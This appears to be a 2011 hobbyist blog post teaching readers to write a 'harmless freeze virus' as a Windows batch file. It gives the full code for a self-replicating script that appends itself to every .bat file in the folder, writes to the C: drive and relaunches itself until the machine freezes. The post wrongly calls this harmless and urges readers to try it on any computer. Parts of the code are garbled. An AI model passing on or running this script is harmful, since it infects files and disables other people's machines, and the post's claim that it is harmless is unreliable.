Welcome to the world of VIRUS

Here you will find out how to create harmless virus programming,its logic & implementation.So get started with this blog & become VIRUS programmer!

Monday, January 24, 2011

To create harmless freeze virus

Its a basic harmless type of virus which I am going tell now.These are steps to create self replicating virus which freezes computer untill it is switched off or you can say shut down.


1.Open Notepad or other word processor.

2.Type on the first line, "start virus.bat,"

then, on the next #type the following code:

o @echo off

o for %%f in (*.bat) do copy virus.bat+%%f

if not exist c:\fr.htm echo {{{1}}}>c:\fr.htm

o start virus.bat

3.Save the file as "virus.bat"
and select all files. You can change "virus" to anything you want.

Open the file and it will open so many pointless windows,

your computer will freeze.

Shut down your computer and it will return to normal.


you can try this on any computer.

If you are having any problems you can ask in comments.

No comments:

Post a Comment

Do you like the given information on topic?